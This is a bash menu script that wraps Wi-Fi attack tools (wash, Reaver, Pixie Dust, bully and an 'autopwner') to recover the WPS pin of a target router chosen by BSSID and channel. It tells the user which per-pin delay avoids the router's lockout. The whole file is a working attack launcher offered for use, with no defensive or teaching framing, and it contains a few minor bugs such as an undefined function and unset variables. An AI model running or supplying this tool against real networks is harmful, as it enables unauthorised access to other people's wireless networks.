#! /bin/bash
#############DEFAULTS###############
#setting yellow-start 
YS="\e[1;33m"
#setting color-end
CE="\e[0m"
#setting red-start
RS="\e[1;31m"
#setting frequent stings
YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
PAKT="Press "$YS"any key$CE to"
PAKTC="Press "$YS"any key$CE to continue..."
PAKTGB="Press "$YS"any key$CE to go back..."

####################################
WLANNM=$(cat /root/lscript/wlanmon.txt)
export WLANNM
function reaver_wpastart
{
	reaver -i $WLANNM -b $BSSIDT -p $WPST -vv
	echo -e "$PAKTC"
	read
}
function associate_aireplay
{
	echo -e "Enter your target's BSSID: "
	read -e BSSIDT
	export BSSIDT
	export -f aireplay_command
	xterm -e bash -c 'aireplay_command; exec bash'
	clear
	exec bash "$0"
}
echo -e "-------------------------"$RS"Finding WPS pin"$CE"-------------------------"
echo -e ""$YS" 1"$CE") Scan with wash"
echo -e ""$YS" 2"$CE") Reaver (slow)"
echo -e ""$YS" 3"$CE") Reaver (if you already have the WPS pin)"
echo -e ""$YS" 4"$CE") Pixie Dust (fast)"
echo -e ""$YS" 5"$CE") Bully - automated tool"
echo -e ""$YS" 6"$CE") WiFi autopwner - automated tool"
echo -e ""$YS" 0"$CE") EXIT"
read -e YN
if [ "$YN" = "1" ]
then
	echo -e "Scaning in new terminal..."
	sleep 1
	gnome-terminal --geometry 90x15+9999+9999 -e "wash -i $WLANNM && read "
	clear
	exec bash "$0"
elif [ "$YN" = "2" ]
then
	echo -e "Enter your target's BSSID: "
	read -e BSSIDT
	echo -e "Enter your target's channel: "
	read -e CHANT
	echo -e "Enter the delay of every pin(WARNING: Put "$YS"30"$CE".The router may block you otherwise.): "
	read -e DELT
	export BSSIDT
	export CHANT
	export DELT
	clear
	echo -e "Starting reaver in a new terminal"
	sleep 1
	GLV="2"
	export GLV
	gnome-terminal -e lh31	
	clear
	exec bash "$0"
elif [ "$YN" = "3" ]
then
	echo -e "Enter your target's BSSID: "
	read -e BSSIDT
	echo -e "Enter your target's WPS pin: "
	read -e WPST
	export BSSIDT
	export WPST
	export reaver_wpastart
	echo -e "Starting reaver in a new terminal"
	sleep 1
	GLV="3"
	export GLV
	clear
	gnome-terminal -e lh31
	clear
	exec bash "$0"
elif [ "$YN" = "4" ]
then
	echo -e "Enter your target's BSSID: "
	read -e BSSIDT
	echo -e "Enter your target's channel: "
	read -e CHANT
	export CHANT
	export BSSIDT
	clear
	reaver -i $WLANNM -b $BSSIDT -vvv -K 1 -c $CHANT -w
	echo -e "$PAKTC"
	read
	clear
	exec bash "$0"
elif [ "$YN" = "5" ]
then
	cd /root/bully/src
	./bully.py
	cd
elif [ "$YN" = "6" ]
then
	cd /root/WiFi-autopwner
	./wifi-autopwner.sh
	cd
elif [ "$YN" = "0" ]
then
	exit
fi
echo -e "Choose again?"$YNYES": "
read -e BB
if [ -z "$BB" ]
then
	if [ "$AA" = "1" ]
		then
		exec bash "$0"
	else
		clear
		exec bash "$0"
	fi
elif [ "$BB" = "y" ]
then
	if [ "$AA" = "1" ]
		then
		exec bash "$0"
	else
		clear
		exec bash "$0"
	fi
else
	clear
	exit
fi
